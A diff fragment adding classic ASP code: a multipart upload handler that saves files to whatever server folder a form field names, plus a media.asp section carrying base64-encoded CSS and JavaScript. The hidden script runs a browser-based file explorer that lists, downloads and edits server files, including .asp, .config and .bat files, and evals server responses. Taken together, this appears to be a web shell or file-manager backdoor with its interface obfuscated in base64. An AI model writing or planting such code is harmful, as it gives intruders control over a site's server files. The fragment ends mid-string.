+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1)))
+		Next
+	End Function
+End Class
+
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+
+	Public Sub SaveToDisk(sPath)
+		on error resume next
+		Dim oFS, oFile, nIndex
+
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+
+		For nIndex = 1 to LenB(FileData)
+		    oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
+		Next
+
+		oFile.Close
+	End Sub
+
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+
+End Class
+
+function Upload(location)
+	Dim Uploader, File
+	Set Uploader = New FileUploader
+
+	Uploader.Upload()
+
+	If Uploader.Files.Count = 0 Then
+		Response.Write "<TR><TD class=""kbrtm"">File(s) not uploaded.</TD></TR>"
+	Else
+		For Each File In Uploader.Files.Items
+			File.SaveToDisk Uploader.mcolFormElem.Item("location")
+
+			if Err.Number<>0 then
+				Response.Write "<TR><TD class=""kbrtm"">File Uploaded: " & File.FileName & " : "
+				Response.Write "Failed (" & Err.Description & ")</TD></TR>"
+				Err.Clear
+			else
+				Response.Write "<TR><TD class=""kbrtm"">File Uploaded: " & Uploader.mcolFormElem.Item("location") & File.FileName & "<br>"
+				Response.Write "Size: " & File.FileSize & " bytes</TD></TR>"
+			end if
+
+		Next
+	End If
+
+	Upload = Uploader.mcolFormElem.Item("linkback")
+end function
+'*************************  Upload  *************************
+
+'*************************  Func.asp  *************************
+
+
+'*************************  media.asp  *************************
+
+dim script, img_loading, img_dir, img_lvUp, img_txt, img_img, img_unknow, media_style
+
+media_style = ""&_
+"Ym9keXsKCW1hcmdpbjowcHg7Cglmb250LXN0eWxlOm5vcm1hbDsKCWZvbnQtc2l6ZToxMXB4OwoJY29sb3I6I0ZGRkZGRjsKCWZvbnQtZmFtaWx5OlZlcmRhbmEsQXJpYWw7CgliYWNrZ3JvdW5kLWNvbG9yOiMzYTNhM2E7CglzY3JvbGxiYXItZmFjZS1jb2xvcjogIzMwMzAzMDsKCXNjcm9sbGJhci1oaWdobGlnaHQtY29sb3I6" &_
+"ICM1ZDVkNWQ7CglzY3JvbGxiYXItc2hhZG93LWNvbG9yOiAjMTIxMjEyOwoJc2Nyb2xsYmFyLTNkbGlnaHQtY29sb3I6ICMzYTNhM2E7CglzY3JvbGxiYXItYXJyb3ctY29sb3I6ICM5ZDlkOWQ7CglzY3JvbGxiYXItdHJhY2stY29sb3I6ICMzYTNhM2E7CglzY3JvbGxiYXItZGFya3NoYWRvdy1jb2xvcjogIzNhM2EzYTsKfQoK" &_
+"CnRkewoJZm9udC1zdHlsZTpub3JtYWw7Cglmb250LXNpemU6MTFweDsKCWNvbG9yOiNGRkZGRkY7Cglmb250LWZhbWlseTpWZXJkYW5hLEFyaWFsOwoJaGVpZ2h0OiAyNHB4Owp9CgphewoJY29sb3I6I0VFRUVFRTsKCXRleHQtZGVjb3JhdGlvbjpub25lOwoJZm9udC1zaXplOjEwcHg7Cglmb250LXdlaWdodDpib2xkOwoJdmVy" &_
+"dGljYWwtYWxpZ246dGV4dC10b3A7Cn0KCmE6aG92ZXJ7Cgljb2xvcjojNDBhMGVjOwp9CgphOnZpc2l0ZWR7Cgljb2xvcjojRUVFRUVFOwp9CgphOnZpc2l0ZWQ6aG92ZXJ7Cgljb2xvcjojNDBhMGVjOwp9Cgp0ZXh0YXJlYXsKCWJhY2tncm91bmQ6IzEyMTIxMjsKCWNvbG9yOiNGRkZGRkY7Zm9udC1mYW1pbHk6VmVyZGFuYSxB" &_
+"cmlhbDsKCWZvbnQtc2l6ZToxMXB4OwoJdmVydGljYWwtYWxpZ246bWlkZGxlOyAKCWhlaWdodDoxODsKCWJvcmRlci1sZWZ0OjFweCBzb2xpZCAjMTIxMjEyOwoJYm9yZGVyLXJpZ2h0OjFweCBzb2xpZCAjNWQ1ZDVkOwoJYm9yZGVyLWJvdHRvbToxcHggc29saWQgIzVkNWQ1ZDsKCWJvcmRlci10b3A6MXB4IHNvbGlkICMxMjEy" &_
+"MTI7Cn0KCmlucHV0ICxzZWxlY3R7CgliYWNrZ3JvdW5kOiMzMDMwMzA7Cgljb2xvcjojRkZGRkZGOwoJZm9udC1mYW1pbHk6VmVyZGFuYSxBcmlhbDsKCWZvbnQtc2l6ZToxMXB4OwoJdmVydGljYWwtYWxpZ246bWlkZGxlOwoJaGVpZ2h0OjI0OyAKCWJvcmRlci1sZWZ0OjFweCBzb2xpZCAjNWQ1ZDVkOwoJYm9yZGVyLXJpZ2h0" &_
+"OjFweCBzb2xpZCAjMTIxMjEyOwoJYm9yZGVyLWJvdHRvbToxcHggc29saWQgIzEyMTIxMjsKCWJvcmRlci10b3A6MXB4IHNvbGlkICM1ZDVkNWQ7Cn0KCmlucHV0LnhjaGVjayB7CglkaXNwbGF5OiBibG9jazsKCWhlaWdodDogMjJweDsKCXdpZHRoOiAyMnB4OwoJcGFkZGluZzogMDsKCW1hcmdpbjogMDsKCWJvcmRlcjogMDsK" &_
+"fQoKLmticnRtewoJYmFja2dyb3VuZDojMzAzMDMwOwoJY29sb3I6I0ZGRkZGRjsKCWZvbnQtZmFtaWx5OlZlcmRhbmEsQXJpYWw7Cglmb250LXNpemU6MTFweDsKCXZlcnRpY2FsLWFsaWduOm1pZGRsZTsKCWhlaWdodDoyNDsgCglib3JkZXItbGVmdDoxcHggc29saWQgIzVkNWQ1ZDsKCWJvcmRlci1yaWdodDoxcHggc29saWQg" &_
+"IzEyMTIxMjsKCWJvcmRlci1ib3R0b206MXB4IHNvbGlkICMxMjEyMTI7Cglib3JkZXItdG9wOjFweCBzb2xpZCAjNWQ1ZDVkOwp9Cgoua2JydG0xewoJYmFja2dyb3VuZDojMzAzMDMwOwoJY29sb3I6I0ZGRkZGRjsKCWZvbnQtZmFtaWx5OlZlcmRhbmEsQXJpYWw7Cglmb250LXNpemU6MTFweDsKCXZlcnRpY2FsLWFsaWduOm1p" &_
+"ZGRsZTsKCWhlaWdodDozMDsgCglib3JkZXItbGVmdDoxcHggc29saWQgIzVkNWQ1ZDsKCWJvcmRlci1yaWdodDoxcHggc29saWQgIzEyMTIxMjsKCWJvcmRlci1ib3R0b206MXB4IHNvbGlkICMxMjEyMTI7Cglib3JkZXItdG9wOjFweCBzb2xpZCAjNWQ1ZDVkOwp9Cgoua2JydG0xIGF7Cgljb2xvcjpvcmFuZ2U7Cgl0ZXh0LWRl" &_
+"Y29yYXRpb246bm9uZTsKCWZvbnQtc2l6ZToxMXB4OwoJZm9udC13ZWlnaHQ6Ym9sZDsKCXZlcnRpY2FsLWFsaWduOnRleHQtbWlkZGxlOwp9Cgoua2JydG0xIGE6dmlzaXRlZHsKCWNvbG9yOm9yYW5nZTsKfQoKLmticnRtMSBhOmhvdmVyewoJY29sb3I6IzQwYTBlYzsKfQoKLmticnRtMSBhOnZpc2l0ZWQ6aG92ZXJ7Cgljb2xv" &_
+"cjojNDBhMGVjOwp9CgouZm5hbWUgewoJd2lkdGg6NDAlOwp9CgouZnNpemUgewoJd2lkdGg6NyU7Cn0KCi5mdHlwZSB7Cgl3aWR0aDo5JTsKfQoKLmZkYXRlIHsKCXdpZHRoOjEzJTsKfQoKLmZjb21tYW5kIHsKCXdpZHRoOjclOwp9CgouZmNoZWNrIHsKCXdpZHRoOjQlOwp9CgouZmFjdGlvbiB7Cgl3aWR0aDoxOCU7Cn0KCi50" &_
+"YWJsZUhlYWQgewoJYmFja2dyb3VuZC1jb2xvcjoxMjEyMTI7CgloZWlnaHQ6MjU7IAp9CgojZ2FwMHsKCWRpc3BsYXk6bm9uZTsKfQoKI292ZXJsYXl7CglkaXNwbGF5Om5vbmU7Cgl6LWluZGV4OiA4MDsKCXBvc2l0aW9uOiBhYnNvbHV0ZTsKCXRvcDogMDsKCWxlZnQ6IDA7Cgl3aWR0aDogMTAwJTsKCWhlaWdodDogMTAwJTsK" &_
+"CWJhY2tncm91bmQtY29sb3I6ICMwMDA7CglvcGFjaXR5OjAuNDsKCWZpbHRlcjphbHBoYShvcGFjaXR5PTQwKTsKfQoKCiN0YmxMb2FkaW5nLCAjdGJsTWFwRHJpdmVyIHsKCWRpc3BsYXk6bm9uZTsKCXotaW5kZXg6IDkwOwoJcG9zaXRpb246Zml4ZWQ7CglfcG9zaXRpb246YWJzb2x1dGU7Cgl0b3A6NTAlOyBsZWZ0OjUwJTsK" &_
+"CW1hcmdpbjotNTBweCBhdXRvIGF1dG8gLTEwMHB4OwoJX3RvcDpleHByZXNzaW9uKGRvY3VtZW50LmJvZHkuc2Nyb2xsVG9wKyhkb2N1bWVudC5ib2R5LmNsaWVudEhlaWdodC10aGlzLmNsaWVudEhlaWdodCkvMik7dGV4dC1hbGlnbjpjZW50ZXI7Cn0KCiN0YmxNZW51IHsKCXotaW5kZXg6IDcwOwoJcG9zaXRpb246Zml4ZWQ7" &_
+"CglfcG9zaXRpb246YWJzb2x1dGU7Cgl0b3A6MiU7IGxlZnQ6NTAlOwoJbWFyZ2luOi01MHB4IGF1dG8gYXV0byAtMTAwcHg7CglfdG9wOmV4cHJlc3Npb24oZG9jdW1lbnQuYm9keS5zY3JvbGxUb3ArKGRvY3VtZW50LmJvZHkuY2xpZW50SGVpZ2h0LXRoaXMuY2xpZW50SGVpZ2h0KS81MCk7dGV4dC1hbGlnbjpjZW50ZXI7Cn0="
+
+script = "" &_
+"dmFyIGlzSUU9LypAY2Nfb24hQCovZmFsc2U7Ly9JRSBkZXRlY3Rvcgp2YXIgbGFzdFVybCA9ICcjRXhwbG9yZXJ8XFwnOwp2YXIgbGFzdFVybEJhY2t1cCA9ICcjRXhwbG9yZXJ8XFwnOwp2YXIgY3VycmVudF91cmwgPSAnJzsKdmFyIGN1cnJlbnRfcnVubmluZyA9IGZhbHNlOwp2YXIgZmllbGQgPSAnJzsKdmFyIGludGVydmFs" &_
+"ID0gJyc7CnZhciBodHRwID0gY3JlYXRlUmVxdWVzdE9iamVjdCgpOwp2YXIgZmZMaXN0ID0gbnVsbDsKdmFyIGxzdFJlc3BvbnNlID0gbnVsbDsKdmFyIGFjdGlvblJlc3BvbnNlID0gbnVsbDsKdmFyIGV4dF90ZXh0ID0gJy50eHQuYXNwLmFzcHgucGhwLmNmbS5qcy5jb25maWcuaHRtLmh0bWwueG1sLmNzcy5pbmkuYmF0LmNt" &_
+"ZC5jcy52Yi5hc3guaW5jLmFzYS5hc2F4LmFzY3gubG9nLic7CnZhciBleHRfaW1nID0gJy5qcGcuanBlLmpwZWcucG5nLmdpZi5wbmcudGlmZi5ibXAuJzsKdmFyIGltZ19sb2FkaW5nID0gbnVsbDsKdmFyIGltZ192aWV3ID0gbnVsbDsKdmFyIHNhdmVUaW1lciA9IDA7CnZhciBwb3NTUUwgPSAwOwp2YXIgcG9zRXhwID0gMDsK" &_
+"dmFyIG5vRmlsZSA9IDA7CnZhciBub0ZvbGRlciA9IDA7CgpTdHJpbmcucHJvdG90eXBlLnRyaW0gPSBmdW5jdGlvbigpIHsKCXJldHVybiB0aGlzLnJlcGxhY2UoL15ccyt8XHMrJC9nLCIiKTsKfQoKU3RyaW5nLnByb3RvdHlwZS5zdGFydHNXaXRoID0gZnVuY3Rpb24oc3RyKXsKICAgIHJldHVybiAodGhpcy5pbmRleE9mKHN0" &_
+"cikgPT09IDApOwp9CgpTdHJpbmcucHJvdG90eXBlLmFkZFNsYXNoID0gZnVuY3Rpb24oKXsKCXBhdGggPSB0aGlzOwoJaWYocGF0aC5sZW5ndGg8MSkgcmV0dXJuIHBhdGg7CglpZihwYXRoLnN1YnN0cmluZyhwYXRoLmxlbmd0aCAtMSkgIT0gJ1xcJykKCXsKCQlwYXRoICs9ICdcXCc7Cgl9CglyZXR1cm4gcGF0aDsKfQoKQXJy" &_
+"YXkucHJvdG90eXBlLnJlbW92ZSA9IGZ1bmN0aW9uKG5hbWUpIHsKCXZhciBpZCA9IHRoaXMubGlzdEZpbmQobmFtZSk7CglpZiAoaWQgPiAtMSkgdGhpcy5zcGxpY2UoaWQsIDEpOwp9CgpBcnJheS5wcm90b3R5cGUubGlzdEZpbmQgPSBmdW5jdGlvbihuYW1lKSB7Cglmb3IoeD0wO3g8dGhpcy5sZW5ndGg7eCsrKQoJewoJCWlm" &_
+"KHRoaXNbeF0uc3RhcnRzV2l0aChuYW1lKyJ8IikpIHJldHVybiB4OwoJfQoJcmV0dXJuIC0xOwp9CgpmdW5jdGlvbiBjb21wYXJlTmFtZXMoYSwgYikgewoJdmFyIG5hbWVBID0gYS5zcGxpdCgifCIpWzBdLnRvTG93ZXJDYXNlKCApOwoJdmFyIG5hbWVCID0gYi5zcGxpdCgifCIpWzBdLnRvTG93ZXJDYXNlKCApOwoJaWYgKG5h" &_
+"bWVBIDwgbmFtZUIpIHtyZXR1cm4gLTF9CglpZiAobmFtZUEgPiBuYW1lQikge3JldHVybiAxfQoJcmV0dXJuIDA7Cn0KCmZ1bmN0aW9uIGFkZEV2ZW50KG9iaiwgZXZUeXBlLCBmbiwgdXNlQ2FwdHVyZSl7CiAgaWYgKG9iai5hZGRFdmVudExpc3RlbmVyKXsKICAgIG9iai5hZGRFdmVudExpc3RlbmVyKGV2VHlwZSwgZm4sIHVz" &_
+"ZUNhcHR1cmUpOwogICAgcmV0dXJuIHRydWU7CiAgfSBlbHNlIGlmIChvYmouYXR0YWNoRXZlbnQpewogICAgdmFyIHIgPSBvYmouYXR0YWNoRXZlbnQoIm9uIitldlR5cGUsIGZuKTsKICAgIHJldHVybiByOwogIH0gZWxzZSB7CiAgICBhbGVydCgiSGFuZGxlciBjb3VsZCBub3QgYmUgYXR0YWNoZWQiKTsKICB9Cn0KCmZ1bmN0" &_
+"aW9uIGNyZWF0SW1hZ2UobmFtZSkgewoJaW1nVGFnID0gIiI7CgoJZXh0TmFtZSA9IG5hbWUudG9Mb3dlckNhc2UoKS5zcGxpdCgnLicpOwoJZXh0TmFtZSA9IGV4dE5hbWVbZXh0TmFtZS5sZW5ndGgtMV07CgoJaWYoZXh0X2ltZy5zZWFyY2goJy4nK2V4dE5hbWUrJy4nKSA+IC0xKQoJCWltZ1RhZyA9ICImbmJzcDsmbmJzcDs8" &_
+"aW1nIHNyYz0nP21vZGU9aW1hZ2UmaW1nSWQ9aW1nJz48QSBocmVmPScjVmlld3wiICsgZmZMaXN0LmluZm8ucGF0aC5hZGRTbGFzaCgpICsgbmFtZSArICInPiIgKyBuYW1lICsgIjwvQT4iCgllbHNlCgkJaW1nVGFnID0gIiZuYnNwOyZuYnNwOzxpbWcgc3JjPSc/bW9kZT1pbWFnZSZpbWdJZD11bmtub3cnPjxBIGhyZWY9Jz9t" &_
+"b2RlPWRvd25sb2FkJmxvY2F0aW9uPSIgKyBmZkxpc3QuaW5mby5wYXRoICsgIiZmaWxlPSIrbmFtZSsiJz4iICsgbmFtZSArICI8L0E+IjsKCglpZihleHRfdGV4dC5zZWFyY2goJy4nK2V4dE5hbWUrJy4nKSA+IC0xKQoJCWltZ1RhZyA9ICImbmJzcDsmbmJzcDs8aW1nIHNyYz0nP21vZGU9aW1hZ2UmaW1nSWQ9dHh0Jz48QSBo" &_
+"cmVmPScjRWRpdHwiICsgZmZMaXN0LmluZm8ucGF0aC5hZGRTbGFzaCgpICsgbmFtZSArICInPiIgKyBuYW1lICsgIjwvQT4iOwoKCXJldHVybiBpbWdUYWc7Cn0KCmZ1bmN0aW9uIGdldElkKGlkKSB7Cgl2YXIgbmV3SWQgPSBmYWxzZTsKCglpZiAoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQpIHsgLy8gRE9NMyA9IElFNSwgTlM2" &_
+"CgkJbmV3SWQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChpZCk7Cgl9CgllbHNlIHsKCQlpZiAoZG9jdW1lbnQubGF5ZXJzKSB7IC8vIE5ldHNjYXBlIDQKCQkJbmV3SWQgPSBkb2N1bWVudC5pZDsKCQl9CgkJZWxzZSB7IC8vIElFIDQKCQkJbmV3SWQgPSBkb2N1bWVudC5hbGwuaWQ7CgkJfQoJfQoJcmV0dXJuIG5ld0lkOwp9" &_
+"CgpmdW5jdGlvbiBjcmVhdGVSZXF1ZXN0T2JqZWN0KCkgewoJdmFyIHhtbGh0dHAgPSBmYWxzZTsKICBpZiAod2luZG93LlhNTEh0dHBSZXF1ZXN0KSB7CgkgeG1saHR0cCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwoJIGlmICh4bWxodHRwLm92ZXJyaWRlTWltZVR5cGUpIHhtbGh0dHAub3ZlcnJpZGVNaW1lVHlwZSgndGV4dC9o" &_
+"dG1sJyk7CiAgfSBlbHNlIGlmICh3aW5kb3cuQWN0aXZlWE9iamVjdCkgewoJIHRyeSB7CgkJeG1saHR0cCA9IG5ldyBBY3RpdmVYT2JqZWN0KCJNc3htbDIuWE1MSFRUUCIpOwoJIH0gY2F0Y2ggKGUpIHsKCQl0cnkgewoJCSAgIHhtbGh0dHAgPSBuZXcgQWN0aXZlWE9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKTsKCQl9IGNh" &_
+"dGNoIChlKSB7fQoJIH0KICB9CiAgcmV0dXJuIHhtbGh0dHA7Cn0KCmZ1bmN0aW9uIHNlbmRSZXF1ZXN0KGxvY2F0aW9uLCBpdGVtU3RhcnQpIHsKCXRyeXsKCQljdXJyZW50X3J1bm5pbmcgPSB0cnVlOwoJCXNob3dMb2FkaW5nKCk7CgkJaWYoIWl0ZW1TdGFydCkgaXRlbVN0YXJ0ID0gMTsKCQlsb2NhdGlvbiA9IGVuY29kZVVS" &_
+"SUNvbXBvbmVudChsb2NhdGlvbik7CgkJaHR0cC5vcGVuKCdQT1NUJywgZmZMaXN0LmluZm8uZmlsZXBhdGgrIiIpOwoJCWh0dHAuc2V0UmVxdWVzdEhlYWRlcignQ29udGVudC1UeXBlJywgJ2FwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcpOwoJCWh0dHAub25yZWFkeXN0YXRlY2hhbmdlID0gaGFuZGxlUmVzcG9u" &_
+"c2U7CgkJaHR0cC5zZW5kKCdtb2RlPWV4cGxvcmVyJml0ZW1TdGFydD0nICsgaXRlbVN0YXJ0ICsgJyZsb2NhdGlvbj0nK2xvY2F0aW9uKTsKCX0KCWNhdGNoKGUpewoJCWNsZWFyVGltZW91dCAoIHNhdmVUaW1lciApOwoJCWFsZXJ0KCJKYXZhc2NyaXB0IFByb2JsZW0gISEhIik7CgkJc2hvd01vZGUoIkV4cGxvcmVyIiwgZmFs" &_
+"c2UpOwoJCWN1cnJlbnRfcnVubmluZyA9IGZhbHNlOwoJCWhpZGVMb2FkaW5nKCk7Cgl9CglmaW5hbGx5e30KfQoKZnVuY3Rpb24gc2VuZFJlcXVlc3RBY3Rpb24obW9kZSwgYWRkaXRpb24pIHsKCXRyeXsKCQljdXJyZW50X3J1bm5pbmcgPSB0cnVlOwoJCXNob3dMb2FkaW5nKCk7CgkJYWRkaXRpb25RdWVyeSA9ICcnOwoKCQlp" &_
+"ZigodHlwZW9mKGFkZGl0aW9uKSkudG9Mb3dlckNhc2UoKSA9PSAnb2JqZWN0JykKCQkJaWYoYWRkaXRpb24ubGVudGggPSAyKQoJCQkJaWYoYWRkaXRpb25bMF0ubGVuZ3RoID4gMCAmJiBhZGRpdGlvblswXS5sZW5ndGggPT0gYWRkaXRpb25bMV0ubGVuZ3RoKQoJCQkJCWZvciAoaT0wO2k8YWRkaXRpb25bMF0ubGVuZ3RoO2kr" &_
+"Kyl7CgkJCQkJCWFkZGl0aW9uUXVlcnkgKz0gJyYnK2FkZGl0aW9uWzBdW2ldKyc9JytlbmNvZGVVUklDb21wb25lbnQoYWRkaXRpb25bMV1baV0pOwoJCQkJCX0KCgkJaWYoYWRkaXRpb25RdWVyeSA9PSAnJykKCQl7CgkJCWFsZXJ0KCJXcm9uZyByZXF1ZXN0ICEhIik7CgkJCWN1cnJlbnRfcnVubmluZyA9IGZhbHNlOwoJCQlo" &_
+"aWRlTG9hZGluZygpOwoJCQlyZXR1cm47CgkJfQoKCQljdXJyZW50X2xvY2F0aW9uID0gZW5jb2RlVVJJQ29tcG9uZW50KGZmTGlzdC5pbmZvLnBhdGgpOwoJCWh0dHAub3BlbignUE9TVCcsIGZmTGlzdC5pbmZvLmZpbGVwYXRoKyIiKTsKCQlodHRwLnNldFJlcXVlc3RIZWFkZXIoJ0NvbnRlbnQtVHlwZScsICdhcHBsaWNhdGlv" &_
+"bi94LXd3dy1mb3JtLXVybGVuY29kZWQnKTsKCQlodHRwLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGhhbmRsZUFjdGlvblJlc3BvbnNlOwoJCWh0dHAuc2VuZCgnbW9kZT0nK21vZGUrJyZsb2NhdGlvbj0nK2N1cnJlbnRfbG9jYXRpb24rYWRkaXRpb25RdWVyeSk7Cgl9CgljYXRjaChlKXsKCQljbGVhclRpbWVvdXQgKCBzYXZlVGlt" &_
+"ZXIgKTsKCQlhbGVydCgiSmF2YXNjcmlwdCBQcm9ibGVtICEhISIpOwoJCXNob3dNb2RlKCJFeHBsb3JlciIsIHRydWUpOwoJCWN1cnJlbnRfcnVubmluZyA9IGZhbHNlOwoJCWhpZGVMb2FkaW5nKCk7Cgl9CglmaW5hbGx5e30KfQoKZnVuY3Rpb24gaGFuZGxlUmVzcG9uc2UoKSB7Cgl0cnkgewoJCWlmKGh0dHAucmVhZHlTdGF0" &_
+"ZSA9PSA0KXsKCQkJdmFyIGNoYW5nZVVybCA9IGZhbHNlOwoJCQl2YXIgcmVzcG9uc2UgPSAnJzsKCQkJaWYgKGh0dHAuc3RhdHVzID09IDIwMCl7CgkJCQlyZXNwb25zZSA9IGh0dHAucmVzcG9uc2VUZXh0OwoJCQkJaWYgKHJlc3BvbnNlLnN0YXJ0c1dpdGgoImxzdFJlc3BvbnNlIikgJiYgZXZhbCgiIiArIHJlc3BvbnNlICsg" &_
+"IiIpKSB7CgkJCQkJaWYobHN0UmVzcG9uc2UuZXJyb3IpCgkJCQkJewoJCQkJCQljaGFuZ2VVcmwgPSB0cnVlOwoKCQkJCQkJYWxlcnQoIkNhbid0IGFjY2VzcyB0byBcIiIgKyBsc3RSZXNwb25zZS5pbmZvLnBhdGguYWRkU2xhc2goKSArICJcIiA6ICIgKyBsc3RSZXNwb25zZS5lcnJvci5lcnJvckRlc2MpOwoJCQkJCQlnZXRJ" &_
+"ZCgnZXJyQ29kZScpLmlubmVySFRNTCA9IGxzdFJlc3BvbnNlLmVycm9yLmVycm9yOwoJCQkJCQlnZXRJZCgnZXJyRGVzYycpLmlubmVySFRNTCA9ICJDYW4ndCBhY2Nlc3MgdG8gXCIiICsgbHN0UmVzcG9uc2UuaW5mby5wYXRoLmFkZFNsYXNoKCkgKyAiXCIgOiAiICsgbHN0UmVzcG9uc2UuZXJyb3IuZXJyb3JEZXNjOwoJCQkJ" &_
+"CQlzaG93ZGl2KCJ0YmxFcnIiLCB0cnVlLCB0cnVlKTsKCQkJCQl9ZWxzZXsKCQkJCQkJc2hvd2RpdigidGJsRXJyIiwgZmFsc2UpOwoJCQkJCQlzaG93ZGl2KCJidExvYWRtb3JlIiwgIWxzdFJlc3BvbnNlLnN0YXR1cy5maW5pc2hlZCk7CgkJCQkJCWlmKGxzdFJlc3BvbnNlLnN0YXR1cy5pdGVtU3RhcnQgPT0gMSl7CgkJCQkJ" &_
+"CQlmZkxpc3QgPSBsc3RSZXNwb25zZTsKCQkJCQkJCW5vRm9sZGVyID0gMDsKCQkJCQkJCW5vRmlsZSA9IDA7CgkJCQkJCQlsYXN0VXJsQmFja3VwID0gd2luZG93LmxvY2F0aW9uLmhyZWY7CgkJCQkJCQlnZXRJZCgicmVtb3RlIikudmFsdWU9ZmZMaXN0LmluZm8ucGF0aC5hZGRTbGFzaCgpOwoJCQkJCQkJZ2V0SWQoInJlbW90" &_
+"ZUNvcHkiKS52YWx1ZSA9IGZmTGlzdC5pbmZvLnBhdGguYWRkU2xhc2goKTsKCQkJCQkJCWdldElkKCJyZW1vdGVNb3ZlIikudmFsdWUgPSBmZkxpc3QuaW5mby5wYXRoLmFkZFNsYXNoKCk7CgkJCQkJCX1lbHNlewoJCQkJCQkJZmZMaXN0LnN0YXR1cy5pdGVtU3RhcnQgPSBsc3RSZXNwb25zZS5zdGF0dXMuaXRlbVN0YXJ0OwoJ" &_
+"CQkJCQkJZmZMaXN0LnN0YXR1cy5maW5pc2hlZCA9IGxzdFJlc3BvbnNlLnN0YXR1cy5maW5pc2hlZDsKCQkJCQkJCWZmTGlzdC5mb2xkZXJzID0gZmZMaXN0LmZvbGRlcnMuY29uY2F0KGxzdFJlc3BvbnNlLmZvbGRlcnMpOwoJCQkJCQkJZmZMaXN0LmZpbGVzID0gZmZMaXN0LmZpbGVzLmNvbmNhdChsc3RSZXNwb25zZS5maWxl" &_
+"cyk7CgkJCQkJCX0KCQkJCQkJLy9mZkxpc3QuZm9sZGVycy5zb3J0KGNvbXBhcmVOYW1lcyk7CgkJCQkJCS8vZmZMaXN0LmZpbGVzLnNvcnQoY29tcGFyZU5hbWVzKTsKCQkJCQkJZGlzcGxheUNvbnRlbnQobHN0UmVzcG9uc2UuZm9sZGVycy5sZW5ndGgsIGxzdFJlc3BvbnNlLmZpbGVzLmxlbmd0aCk7CgkJCQkJfQoJCQkJfWVs" &_
+"c2V7CgkJCQkJCWlmKHJlc3BvbnNlID09ICcnKXsKCQkJCQkJCWFsZXJ0KCJTZXNzaW9uIFRpbWVvdXQuIFBsZWFzZSBsb2dpbiBhZ2FpbiAhIik7CgkJCQkJCX1lbHNlewoJCQkJCQkJYWxlcnQoIkJhZCByZXNwb25zZSAhISEiKTsKCQkJCQkJfQoJCQkJCQljaGFuZ2VVcmwgPSB0cnVlOwoJCQkJfQoJCQl9ZWxzZXsKCQkJCQlj" &_
+"bGVhclRpbWVvdXQgKCBzYXZlVGltZXIgKTsKCQkJCQlhbGVydCgiQmFkIHJlc3BvbnNlIEhUVFAgU3RhdHVzICgiKyBodHRwLnN0YXR1cyArIikgISEhIik7CgkJCQkJY2hhbmdlVXJsID0gdHJ1ZTsKCQkJCX0KCQkJc2hvd01vZGUoJ0V4cGxvcmVyJywgY2hhbmdlVXJsKTsKCQkJY3VycmVudF9ydW5uaW5nID0gZmFsc2U7CgkJ" &_
